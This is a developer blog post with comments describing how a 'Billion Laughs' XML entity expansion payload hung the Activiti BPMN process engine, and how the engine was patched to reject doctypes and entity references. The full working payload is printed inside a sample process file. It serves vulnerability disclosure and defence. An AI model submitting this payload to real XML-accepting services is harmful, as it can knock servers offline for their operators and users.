Uploading a funny XML can bring down your server

By coincidence I stumbled upon the following slideware this weekend: http://portal.sliderocket.com/CJAKM/xml-attacks

In those slides, the author proclaims that you can make your XML so that it can attack your server. As this sounded pretty fishy, I decided to give it a try with Activiti. I created a ‘Billion Laugh Attack’ as described in the link above:


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE lols [
 <!ENTITY lol "lol">
 <!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
 <!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
 <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
 <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
 <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
 <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
 <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
 <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
 <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>
<definitions
 xmlns="http://www.omg.org/spec/BPMN/20100524/MODEL"
 xmlns:activiti="http://activiti.org/bpmn"
 targetNamespace="Examples">

<process id="oneTaskProcess" name="The One Task Process">
 <documentation>This is a process for testing purposes</documentation>

 <startEvent id="theStart" />
 <sequenceFlow id="flow1" sourceRef="theStart" targetRef="theTask" />
 <userTask id="theTask" name="my task" />
 <sequenceFlow id="flow2" sourceRef="theTask" targetRef="theEnd" />
 <endEvent id="theEnd" />

 </process>

</definitions>

This simple process (without the doctype and entity stuff) normally parses like nothing. But when I added those¬†malicious snippets of XML to my process … the engine started parsing the process … and kept parsing … and parsing …. and after 15 minutes I killed the process, not having finished the parsing of this simple process.

Of course, normally the XML’s that are uploaded to the Activiti process engine are under control of the developers. So typically it is a non-issue. But still. Suppose someone actually offers to upload any process BPMN 2.0 XML to end users …. Just fire off a few of these processes and you’ll see your server go down very easily.

I must say, I was completely flabbergasted by this. I assumed I could trust the JDK xml classes to do the right thing. But the fact is … it is pretty hard to know what the ‘right thing’ is here. I think many frameworks that allow xml that are using JDK xml parsing will have a problem with this.

Anyway, we quickly patched the Activiti engine to not parse any doctype or resolve any entity references (and some other fixes as mentioned in the link above) (see commit) and all is unicorns and rainbows again.

But it learned me a valuable lesson (again): never assume your code is safe. There is always someone out there with more time and creativity and bad intentions.

3 Comments

  1. Santeri Vesalainen March 27, 2013

    Just curious is this commit https://github.com/Activiti/Activiti/commit/26cfc3b38322d40be84ce4b36fc84f9c7b4788a1#L0L167 related to http://forums.activiti.org/en/viewtopic.php?f=9&t=6148 ?

    I tried workaround mentioned in forum post “by adding xercesImpl 2.10.0 as JAR dependency.”, which was not good fix enough, Now I am trying to figure out how to configure jboss AS 7.1.3Final and this does not help me at all http://stackoverflow.com/questions/11677572/dealing-with-xerces-hell-in-java-maven

  2. Joram Barrez March 28, 2013

    @ Santeri: yes that commit is related. We’ve rereleased 5.12 very son after the initial release: http://bpmn20inaction.blogspot.nl/2013/03/activiti-512-jdk-6-bugfix.html. Note that the title says JDK6 but it also means “JBoss” in this case.

    We’ve also made sure there is backwards compatibility: http://activiti.org/userguide/index.html#advanced.safe.bpmn.xml

    Do you still see the issue in the linked forum post with 5.12 on JBoss?

  3. Santeri Vesalainen May 2, 2013

    Thanks for answer. Not exactly because problems link with another dependency (builtin xerces impl) in vaadin-client-compiler:7.0.5, yet forum workaround works.

    Trackback URL: http://dev.vaadin.com/ticket/9851#comment:8

Leave a Reply

Your email address will not be published.

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>